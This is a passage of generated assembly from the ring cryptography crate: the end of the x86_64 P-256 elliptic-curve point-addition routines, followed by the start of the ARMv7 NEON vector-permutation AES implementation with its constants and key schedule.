movq 544(%rsp),%rdx
leaq 544(%rsp),%rbx
movq 0+352(%rsp),%r9
movq 8+352(%rsp),%r10
leaq -128+352(%rsp),%rsi
movq 16+352(%rsp),%r11
movq 24+352(%rsp),%r12
leaq 352(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 0(%rsp),%rdx
leaq 0(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 128(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 160(%rsp),%rdx
leaq 160(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 192(%rsp),%rdi
call __ecp_nistz256_mul_montx
xorq %r11,%r11
addq %r12,%r12
leaq 96(%rsp),%rsi
adcq %r13,%r13
movq %r12,%rax
adcq %r8,%r8
adcq %r9,%r9
movq %r13,%rbp
adcq $0,%r11
subq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
movq 0(%rsi),%rax
cmovcq %rbp,%r13
movq 8(%rsi),%rbp
cmovcq %rcx,%r8
movq 16(%rsi),%rcx
cmovcq %r10,%r9
movq 24(%rsi),%r10
call __ecp_nistz256_subx
leaq 128(%rsp),%rbx
leaq 288(%rsp),%rdi
call __ecp_nistz256_sub_fromx
movq 192+0(%rsp),%rax
movq 192+8(%rsp),%rbp
movq 192+16(%rsp),%rcx
movq 192+24(%rsp),%r10
leaq 320(%rsp),%rdi
call __ecp_nistz256_subx
movq %r12,0(%rdi)
movq %r13,8(%rdi)
movq %r8,16(%rdi)
movq %r9,24(%rdi)
movq 128(%rsp),%rdx
leaq 128(%rsp),%rbx
movq 0+224(%rsp),%r9
movq 8+224(%rsp),%r10
leaq -128+224(%rsp),%rsi
movq 16+224(%rsp),%r11
movq 24+224(%rsp),%r12
leaq 256(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 320(%rsp),%rdx
leaq 320(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq -128+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 320(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 256(%rsp),%rbx
leaq 320(%rsp),%rdi
call __ecp_nistz256_sub_fromx
.byte 102,72,15,126,199
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 352(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 352+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 544(%rsp),%xmm2
pand 544+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 448(%rsp),%xmm2
pand 448+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,64(%rdi)
movdqu %xmm3,80(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 288(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 288+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 480(%rsp),%xmm2
pand 480+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 384(%rsp),%xmm2
pand 384+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,0(%rdi)
movdqu %xmm3,16(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 320(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 320+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 512(%rsp),%xmm2
pand 512+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 416(%rsp),%xmm2
pand 416+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,32(%rdi)
movdqu %xmm3,48(%rdi)
L$add_donex:
leaq 576+56(%rsp),%rsi
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbx
movq -8(%rsi),%rbp
leaq (%rsi),%rsp
L$point_addx_epilogue:
ret
.globl _ecp_nistz256_point_add_affine_adx
.private_extern _ecp_nistz256_point_add_affine_adx
.p2align 5
_ecp_nistz256_point_add_affine_adx:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
subq $480+8,%rsp
L$add_affinex_body:
movdqu 0(%rsi),%xmm0
movq %rdx,%rbx
movdqu 16(%rsi),%xmm1
movdqu 32(%rsi),%xmm2
movdqu 48(%rsi),%xmm3
movdqu 64(%rsi),%xmm4
movdqu 80(%rsi),%xmm5
movq 64+0(%rsi),%rdx
movq 64+8(%rsi),%r14
movq 64+16(%rsi),%r15
movq 64+24(%rsi),%r8
movdqa %xmm0,320(%rsp)
movdqa %xmm1,320+16(%rsp)
movdqa %xmm2,352(%rsp)
movdqa %xmm3,352+16(%rsp)
movdqa %xmm4,384(%rsp)
movdqa %xmm5,384+16(%rsp)
por %xmm4,%xmm5
movdqu 0(%rbx),%xmm0
pshufd $0xb1,%xmm5,%xmm3
movdqu 16(%rbx),%xmm1
movdqu 32(%rbx),%xmm2
por %xmm3,%xmm5
movdqu 48(%rbx),%xmm3
movdqa %xmm0,416(%rsp)
pshufd $0x1e,%xmm5,%xmm4
movdqa %xmm1,416+16(%rsp)
por %xmm0,%xmm1
.byte 102,72,15,110,199
movdqa %xmm2,448(%rsp)
movdqa %xmm3,448+16(%rsp)
por %xmm2,%xmm3
por %xmm4,%xmm5
pxor %xmm4,%xmm4
por %xmm1,%xmm3
leaq 64-128(%rsi),%rsi
leaq 32(%rsp),%rdi
call __ecp_nistz256_sqr_montx
pcmpeqd %xmm4,%xmm5
pshufd $0xb1,%xmm3,%xmm4
movq 0(%rbx),%rdx
movq %r12,%r9
por %xmm3,%xmm4
pshufd $0,%xmm5,%xmm5
pshufd $0x1e,%xmm4,%xmm3
movq %r13,%r10
por %xmm3,%xmm4
pxor %xmm3,%xmm3
movq %r14,%r11
pcmpeqd %xmm3,%xmm4
pshufd $0,%xmm4,%xmm4
leaq 32-128(%rsp),%rsi
movq %r15,%r12
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 320(%rsp),%rbx
leaq 64(%rsp),%rdi
call __ecp_nistz256_sub_fromx
movq 384(%rsp),%rdx
leaq 384(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 384(%rsp),%rdx
leaq 384(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq -128+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 288(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 448(%rsp),%rdx
leaq 448(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 352(%rsp),%rbx
leaq 96(%rsp),%rdi
call __ecp_nistz256_sub_fromx
movq 0+64(%rsp),%rdx
movq 8+64(%rsp),%r14
leaq -128+64(%rsp),%rsi
movq 16+64(%rsp),%r15
movq 24+64(%rsp),%r8
leaq 128(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 0+96(%rsp),%rdx
movq 8+96(%rsp),%r14
leaq -128+96(%rsp),%rsi
movq 16+96(%rsp),%r15
movq 24+96(%rsp),%r8
leaq 192(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 128(%rsp),%rdx
leaq 128(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq -128+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 160(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 320(%rsp),%rdx
leaq 320(%rsp),%rbx
movq 0+128(%rsp),%r9
movq 8+128(%rsp),%r10
leaq -128+128(%rsp),%rsi
movq 16+128(%rsp),%r11
movq 24+128(%rsp),%r12
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montx
xorq %r11,%r11
addq %r12,%r12
leaq 192(%rsp),%rsi
adcq %r13,%r13
movq %r12,%rax
adcq %r8,%r8
adcq %r9,%r9
movq %r13,%rbp
adcq $0,%r11
subq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
movq 0(%rsi),%rax
cmovcq %rbp,%r13
movq 8(%rsi),%rbp
cmovcq %rcx,%r8
movq 16(%rsi),%rcx
cmovcq %r10,%r9
movq 24(%rsi),%r10
call __ecp_nistz256_subx
leaq 160(%rsp),%rbx
leaq 224(%rsp),%rdi
call __ecp_nistz256_sub_fromx
movq 0+0(%rsp),%rax
movq 0+8(%rsp),%rbp
movq 0+16(%rsp),%rcx
movq 0+24(%rsp),%r10
leaq 64(%rsp),%rdi
call __ecp_nistz256_subx
movq %r12,0(%rdi)
movq %r13,8(%rdi)
movq %r8,16(%rdi)
movq %r9,24(%rdi)
movq 352(%rsp),%rdx
leaq 352(%rsp),%rbx
movq 0+160(%rsp),%r9
movq 8+160(%rsp),%r10
leaq -128+160(%rsp),%rsi
movq 16+160(%rsp),%r11
movq 24+160(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 96(%rsp),%rdx
leaq 96(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq -128+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 64(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 32(%rsp),%rbx
leaq 256(%rsp),%rdi
call __ecp_nistz256_sub_fromx
.byte 102,72,15,126,199
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 288(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 288+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand L$ONE_mont(%rip),%xmm2
pand L$ONE_mont+16(%rip),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 384(%rsp),%xmm2
pand 384+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,64(%rdi)
movdqu %xmm3,80(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 224(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 224+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 416(%rsp),%xmm2
pand 416+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 320(%rsp),%xmm2
pand 320+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,0(%rdi)
movdqu %xmm3,16(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 256(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 256+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 448(%rsp),%xmm2
pand 448+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 352(%rsp),%xmm2
pand 352+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,32(%rdi)
movdqu %xmm3,48(%rdi)
leaq 480+56(%rsp),%rsi
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbx
movq -8(%rsi),%rbp
leaq (%rsi),%rsp
L$add_affinex_epilogue:
ret
#endif
|
mi2bjss/Pressel-site | 23,124 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/vpaes-armv7-linux32.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_ARM) && defined(__ELF__)
.syntax unified
.arch armv7-a
.fpu neon
#if defined(__thumb2__)
.thumb
#else
.code 32
#endif
.text
.type _vpaes_consts,%object
.align 7 @ totally strategic alignment
_vpaes_consts:
.Lk_mc_forward:@ mc_forward
.quad 0x0407060500030201, 0x0C0F0E0D080B0A09
.quad 0x080B0A0904070605, 0x000302010C0F0E0D
.quad 0x0C0F0E0D080B0A09, 0x0407060500030201
.quad 0x000302010C0F0E0D, 0x080B0A0904070605
.Lk_mc_backward:@ mc_backward
.quad 0x0605040702010003, 0x0E0D0C0F0A09080B
.quad 0x020100030E0D0C0F, 0x0A09080B06050407
.quad 0x0E0D0C0F0A09080B, 0x0605040702010003
.quad 0x0A09080B06050407, 0x020100030E0D0C0F
.Lk_sr:@ sr
.quad 0x0706050403020100, 0x0F0E0D0C0B0A0908
.quad 0x030E09040F0A0500, 0x0B06010C07020D08
.quad 0x0F060D040B020900, 0x070E050C030A0108
.quad 0x0B0E0104070A0D00, 0x0306090C0F020508
@
@ "Hot" constants
@
.Lk_inv:@ inv, inva
.quad 0x0E05060F0D080180, 0x040703090A0B0C02
.quad 0x01040A060F0B0780, 0x030D0E0C02050809
.Lk_ipt:@ input transform (lo, hi)
.quad 0xC2B2E8985A2A7000, 0xCABAE09052227808
.quad 0x4C01307D317C4D00, 0xCD80B1FCB0FDCC81
.Lk_sbo:@ sbou, sbot
.quad 0xD0D26D176FBDC700, 0x15AABF7AC502A878
.quad 0xCFE474A55FBB6A00, 0x8E1E90D1412B35FA
.Lk_sb1:@ sb1u, sb1t
.quad 0x3618D415FAE22300, 0x3BF7CCC10D2ED9EF
.quad 0xB19BE18FCB503E00, 0xA5DF7A6E142AF544
.Lk_sb2:@ sb2u, sb2t
.quad 0x69EB88400AE12900, 0xC2A163C8AB82234A
.quad 0xE27A93C60B712400, 0x5EB7E955BC982FCD
.byte 86,101,99,116,111,114,32,80,101,114,109,117,116,97,116,105,111,110,32,65,69,83,32,102,111,114,32,65,82,77,118,55,32,78,69,79,78,44,32,77,105,107,101,32,72,97,109,98,117,114,103,32,40,83,116,97,110,102,111,114,100,32,85,110,105,118,101,114,115,105,116,121,41,0
.align 2
.size _vpaes_consts,.-_vpaes_consts
.align 6
@@
@@ _vpaes_preheat
@@
@@ Fills q9-q15 as specified below.
@@
.type _vpaes_preheat,%function
.align 4
_vpaes_preheat:
adr r10, .Lk_inv
vmov.i8 q9, #0x0f @ .Lk_s0F
vld1.64 {q10,q11}, [r10]! @ .Lk_inv
add r10, r10, #64 @ Skip .Lk_ipt, .Lk_sbo
vld1.64 {q12,q13}, [r10]! @ .Lk_sb1
vld1.64 {q14,q15}, [r10] @ .Lk_sb2
bx lr
@@
@@ _vpaes_encrypt_core
@@
@@ AES-encrypt q0.
@@
@@ Inputs:
@@ q0 = input
@@ q9-q15 as in _vpaes_preheat
@@ [r2] = scheduled keys
@@
@@ Output in q0
@@ Clobbers q1-q5, r8-r11
@@ Preserves q6-q8 so you get some local vectors
@@
@@
.type _vpaes_encrypt_core,%function
.align 4
_vpaes_encrypt_core:
mov r9, r2
ldr r8, [r2,#240] @ pull rounds
adr r11, .Lk_ipt
@ vmovdqa .Lk_ipt(%rip), %xmm2 # iptlo
@ vmovdqa .Lk_ipt+16(%rip), %xmm3 # ipthi
vld1.64 {q2, q3}, [r11]
adr r11, .Lk_mc_forward+16
vld1.64 {q5}, [r9]! @ vmovdqu (%r9), %xmm5 # round0 key
vand q1, q0, q9 @ vpand %xmm9, %xmm0, %xmm1
vshr.u8 q0, q0, #4 @ vpsrlb $4, %xmm0, %xmm0
vtbl.8 d2, {q2}, d2 @ vpshufb %xmm1, %xmm2, %xmm1
vtbl.8 d3, {q2}, d3
vtbl.8 d4, {q3}, d0 @ vpshufb %xmm0, %xmm3, %xmm2
vtbl.8 d5, {q3}, d1
veor q0, q1, q5 @ vpxor %xmm5, %xmm1, %xmm0
veor q0, q0, q2 @ vpxor %xmm2, %xmm0, %xmm0
@ .Lenc_entry ends with a bne instruction which is normally paired with
@ subs in .Lenc_loop.
tst r8, r8
b .Lenc_entry
.align 4
.Lenc_loop:
@ middle of middle round
add r10, r11, #0x40
vtbl.8 d8, {q13}, d4 @ vpshufb %xmm2, %xmm13, %xmm4 # 4 = sb1u
vtbl.8 d9, {q13}, d5
vld1.64 {q1}, [r11]! @ vmovdqa -0x40(%r11,%r10), %xmm1 # .Lk_mc_forward[]
vtbl.8 d0, {q12}, d6 @ vpshufb %xmm3, %xmm12, %xmm0 # 0 = sb1t
vtbl.8 d1, {q12}, d7
veor q4, q4, q5 @ vpxor %xmm5, %xmm4, %xmm4 # 4 = sb1u + k
vtbl.8 d10, {q15}, d4 @ vpshufb %xmm2, %xmm15, %xmm5 # 4 = sb2u
vtbl.8 d11, {q15}, d5
veor q0, q0, q4 @ vpxor %xmm4, %xmm0, %xmm0 # 0 = A
vtbl.8 d4, {q14}, d6 @ vpshufb %xmm3, %xmm14, %xmm2 # 2 = sb2t
vtbl.8 d5, {q14}, d7
vld1.64 {q4}, [r10] @ vmovdqa (%r11,%r10), %xmm4 # .Lk_mc_backward[]
vtbl.8 d6, {q0}, d2 @ vpshufb %xmm1, %xmm0, %xmm3 # 0 = B
vtbl.8 d7, {q0}, d3
veor q2, q2, q5 @ vpxor %xmm5, %xmm2, %xmm2 # 2 = 2A
@ Write to q5 instead of q0, so the table and destination registers do
@ not overlap.
vtbl.8 d10, {q0}, d8 @ vpshufb %xmm4, %xmm0, %xmm0 # 3 = D
vtbl.8 d11, {q0}, d9
veor q3, q3, q2 @ vpxor %xmm2, %xmm3, %xmm3 # 0 = 2A+B
vtbl.8 d8, {q3}, d2 @ vpshufb %xmm1, %xmm3, %xmm4 # 0 = 2B+C
vtbl.8 d9, {q3}, d3
@ Here we restore the original q0/q5 usage.
veor q0, q5, q3 @ vpxor %xmm3, %xmm0, %xmm0 # 3 = 2A+B+D
and r11, r11, #~(1<<6) @ and $0x30, %r11 # ... mod 4
veor q0, q0, q4 @ vpxor %xmm4, %xmm0, %xmm0 # 0 = 2A+3B+C+D
subs r8, r8, #1 @ nr--
.Lenc_entry:
@ top of round
vand q1, q0, q9 @ vpand %xmm0, %xmm9, %xmm1 # 0 = k
vshr.u8 q0, q0, #4 @ vpsrlb $4, %xmm0, %xmm0 # 1 = i
vtbl.8 d10, {q11}, d2 @ vpshufb %xmm1, %xmm11, %xmm5 # 2 = a/k
vtbl.8 d11, {q11}, d3
veor q1, q1, q0 @ vpxor %xmm0, %xmm1, %xmm1 # 0 = j
vtbl.8 d6, {q10}, d0 @ vpshufb %xmm0, %xmm10, %xmm3 # 3 = 1/i
vtbl.8 d7, {q10}, d1
vtbl.8 d8, {q10}, d2 @ vpshufb %xmm1, %xmm10, %xmm4 # 4 = 1/j
vtbl.8 d9, {q10}, d3
veor q3, q3, q5 @ vpxor %xmm5, %xmm3, %xmm3 # 3 = iak = 1/i + a/k
veor q4, q4, q5 @ vpxor %xmm5, %xmm4, %xmm4 # 4 = jak = 1/j + a/k
vtbl.8 d4, {q10}, d6 @ vpshufb %xmm3, %xmm10, %xmm2 # 2 = 1/iak
vtbl.8 d5, {q10}, d7
vtbl.8 d6, {q10}, d8 @ vpshufb %xmm4, %xmm10, %xmm3 # 3 = 1/jak
vtbl.8 d7, {q10}, d9
veor q2, q2, q1 @ vpxor %xmm1, %xmm2, %xmm2 # 2 = io
veor q3, q3, q0 @ vpxor %xmm0, %xmm3, %xmm3 # 3 = jo
vld1.64 {q5}, [r9]! @ vmovdqu (%r9), %xmm5
bne .Lenc_loop
@ middle of last round
add r10, r11, #0x80
adr r11, .Lk_sbo
@ Read to q1 instead of q4, so the vtbl.8 instruction below does not
@ overlap table and destination registers.
vld1.64 {q1}, [r11]! @ vmovdqa -0x60(%r10), %xmm4 # 3 : sbou
vld1.64 {q0}, [r11] @ vmovdqa -0x50(%r10), %xmm0 # 0 : sbot .Lk_sbo+16
vtbl.8 d8, {q1}, d4 @ vpshufb %xmm2, %xmm4, %xmm4 # 4 = sbou
vtbl.8 d9, {q1}, d5
vld1.64 {q1}, [r10] @ vmovdqa 0x40(%r11,%r10), %xmm1 # .Lk_sr[]
@ Write to q2 instead of q0 below, to avoid overlapping table and
@ destination registers.
vtbl.8 d4, {q0}, d6 @ vpshufb %xmm3, %xmm0, %xmm0 # 0 = sb1t
vtbl.8 d5, {q0}, d7
veor q4, q4, q5 @ vpxor %xmm5, %xmm4, %xmm4 # 4 = sb1u + k
veor q2, q2, q4 @ vpxor %xmm4, %xmm0, %xmm0 # 0 = A
@ Here we restore the original q0/q2 usage.
vtbl.8 d0, {q2}, d2 @ vpshufb %xmm1, %xmm0, %xmm0
vtbl.8 d1, {q2}, d3
bx lr
.size _vpaes_encrypt_core,.-_vpaes_encrypt_core
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@ @@
@@ AES key schedule @@
@@ @@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This function diverges from both x86_64 and aarch64 in which constants are
@ pinned. x86_64 has a common preheat function for all operations. aarch64
@ separates them because it has enough registers to pin nearly all constants.
@ armv7 does not have enough registers, but needing explicit loads and stores
@ also complicates using x86_64's register allocation directly.
@
@ We pin some constants for convenience and leave q14 and q15 free to load
@ others on demand.
@
@ Key schedule constants
@
.type _vpaes_key_consts,%object
.align 4
_vpaes_key_consts:
.Lk_rcon:@ rcon
.quad 0x1F8391B9AF9DEEB6, 0x702A98084D7C7D81
.Lk_opt:@ output transform
.quad 0xFF9F4929D6B66000, 0xF7974121DEBE6808
.quad 0x01EDBD5150BCEC00, 0xE10D5DB1B05C0CE0
.Lk_deskew:@ deskew tables: inverts the sbox's "skew"
.quad 0x07E4A34047A4E300, 0x1DFEB95A5DBEF91A
.quad 0x5F36B5DC83EA6900, 0x2841C2ABF49D1E77
.size _vpaes_key_consts,.-_vpaes_key_consts
.type _vpaes_key_preheat,%function
.align 4
_vpaes_key_preheat:
adr r11, .Lk_rcon
vmov.i8 q12, #0x5b @ .Lk_s63
adr r10, .Lk_inv @ Must be aligned to 8 mod 16.
vmov.i8 q9, #0x0f @ .Lk_s0F
vld1.64 {q10,q11}, [r10] @ .Lk_inv
vld1.64 {q8}, [r11] @ .Lk_rcon
bx lr
.size _vpaes_key_preheat,.-_vpaes_key_preheat
.type _vpaes_schedule_core,%function
.align 4
_vpaes_schedule_core:
@ We only need to save lr, but ARM requires an 8-byte stack alignment,
@ so save an extra register.
stmdb sp!, {r3,lr}
bl _vpaes_key_preheat @ load the tables
adr r11, .Lk_ipt @ Must be aligned to 8 mod 16.
vld1.64 {q0}, [r0]! @ vmovdqu (%rdi), %xmm0 # load key (unaligned)
@ input transform
@ Use q4 here rather than q3 so .Lschedule_am_decrypting does not
@ overlap table and destination.
vmov q4, q0 @ vmovdqa %xmm0, %xmm3
bl _vpaes_schedule_transform
adr r10, .Lk_sr @ Must be aligned to 8 mod 16.
vmov q7, q0 @ vmovdqa %xmm0, %xmm7
add r8, r8, r10
@ encrypting, output zeroth round key after transform
vst1.64 {q0}, [r2] @ vmovdqu %xmm0, (%rdx)
@ *ring*: Decryption removed.
.Lschedule_go:
cmp r1, #192 @ cmp $192, %esi
bhi .Lschedule_256
	@ 128: fall through
@@
@@ .schedule_128
@@
@@ 128-bit specific part of key schedule.
@@
@@ This schedule is really simple, because all its parts
@@ are accomplished by the subroutines.
@@
.Lschedule_128:
mov r0, #10 @ mov $10, %esi
.Loop_schedule_128:
bl _vpaes_schedule_round
subs r0, r0, #1 @ dec %esi
beq .Lschedule_mangle_last
bl _vpaes_schedule_mangle @ write output
b .Loop_schedule_128
@@
@@ .aes_schedule_256
@@
@@ 256-bit specific part of key schedule.
@@
@@ The structure here is very similar to the 128-bit
@@ schedule, but with an additional "low side" in
@@ q6. The low side's rounds are the same as the
@@ high side's, except no rcon and no rotation.
@@
.align 4
.Lschedule_256:
vld1.64 {q0}, [r0] @ vmovdqu 16(%rdi),%xmm0 # load key part 2 (unaligned)
bl _vpaes_schedule_transform @ input transform
mov r0, #7 @ mov $7, %esi
.Loop_schedule_256:
bl _vpaes_schedule_mangle @ output low result
vmov q6, q0 @ vmovdqa %xmm0, %xmm6 # save cur_lo in xmm6
@ high round
bl _vpaes_schedule_round
subs r0, r0, #1 @ dec %esi
beq .Lschedule_mangle_last
bl _vpaes_schedule_mangle
@ low round. swap xmm7 and xmm6
vdup.32 q0, d1[1] @ vpshufd $0xFF, %xmm0, %xmm0
vmov.i8 q4, #0
vmov q5, q7 @ vmovdqa %xmm7, %xmm5
vmov q7, q6 @ vmovdqa %xmm6, %xmm7
bl _vpaes_schedule_low_round
vmov q7, q5 @ vmovdqa %xmm5, %xmm7
b .Loop_schedule_256
@@
@@ .aes_schedule_mangle_last
@@
@@ Mangler for last round of key schedule
@@ Mangles q0
@@ when encrypting, outputs out(q0) ^ 0x63
@@ when decrypting, outputs unskew(q0)
@@
@@ Always called right before return... jumps to cleanup and exits
@@
.align 4
.Lschedule_mangle_last:
@ schedule last round key from xmm0
adr r11, .Lk_deskew @ lea .Lk_deskew(%rip),%r11 # prepare to deskew
@ encrypting
vld1.64 {q1}, [r8] @ vmovdqa (%r8,%r10),%xmm1
adr r11, .Lk_opt @ lea .Lk_opt(%rip), %r11 # prepare to output transform
add r2, r2, #32 @ add $32, %rdx
vmov q2, q0
vtbl.8 d0, {q2}, d2 @ vpshufb %xmm1, %xmm0, %xmm0 # output permute
vtbl.8 d1, {q2}, d3
.Lschedule_mangle_last_dec:
sub r2, r2, #16 @ add $-16, %rdx
veor q0, q0, q12 @ vpxor .Lk_s63(%rip), %xmm0, %xmm0
bl _vpaes_schedule_transform @ output transform
vst1.64 {q0}, [r2] @ vmovdqu %xmm0, (%rdx) # save last key
@ cleanup
veor q0, q0, q0 @ vpxor %xmm0, %xmm0, %xmm0
veor q1, q1, q1 @ vpxor %xmm1, %xmm1, %xmm1
veor q2, q2, q2 @ vpxor %xmm2, %xmm2, %xmm2
veor q3, q3, q3 @ vpxor %xmm3, %xmm3, %xmm3
veor q4, q4, q4 @ vpxor %xmm4, %xmm4, %xmm4
veor q5, q5, q5 @ vpxor %xmm5, %xmm5, %xmm5
veor q6, q6, q6 @ vpxor %xmm6, %xmm6, %xmm6
veor q7, q7, q7 @ vpxor %xmm7, %xmm7, %xmm7
ldmia sp!, {r3,pc} @ return
.size _vpaes_schedule_core,.-_vpaes_schedule_core
@@
@@ .aes_schedule_round
@@
@@ Runs one main round of the key schedule on q0, q7
@@
@@ Specifically, runs subbytes on the high dword of q0
@@ then rotates it by one byte and xors into the low dword of
@@ q7.
@@
@@ Adds rcon from low byte of q8, then rotates q8 for
@@ next rcon.
@@
@@ Smears the dwords of q7 by xoring the low into the
@@ second low, result into third, result into highest.
@@
@@ Returns results in q7 = q0.
@@ Clobbers q1-q4, r11.
@@
.type _vpaes_schedule_round,%function
.align 4
_vpaes_schedule_round:
@ extract rcon from xmm8
vmov.i8 q4, #0 @ vpxor %xmm4, %xmm4, %xmm4
vext.8 q1, q8, q4, #15 @ vpalignr $15, %xmm8, %xmm4, %xmm1
vext.8 q8, q8, q8, #15 @ vpalignr $15, %xmm8, %xmm8, %xmm8
veor q7, q7, q1 @ vpxor %xmm1, %xmm7, %xmm7
@ rotate
vdup.32 q0, d1[1] @ vpshufd $0xFF, %xmm0, %xmm0
vext.8 q0, q0, q0, #1 @ vpalignr $1, %xmm0, %xmm0, %xmm0
@ fall through...
@ low round: same as high round, but no rotation and no rcon.
_vpaes_schedule_low_round:
@ The x86_64 version pins .Lk_sb1 in %xmm13 and .Lk_sb1+16 in %xmm12.
@ We pin other values in _vpaes_key_preheat, so load them now.
adr r11, .Lk_sb1
vld1.64 {q14,q15}, [r11]
@ smear xmm7
vext.8 q1, q4, q7, #12 @ vpslldq $4, %xmm7, %xmm1
veor q7, q7, q1 @ vpxor %xmm1, %xmm7, %xmm7
vext.8 q4, q4, q7, #8 @ vpslldq $8, %xmm7, %xmm4
@ subbytes
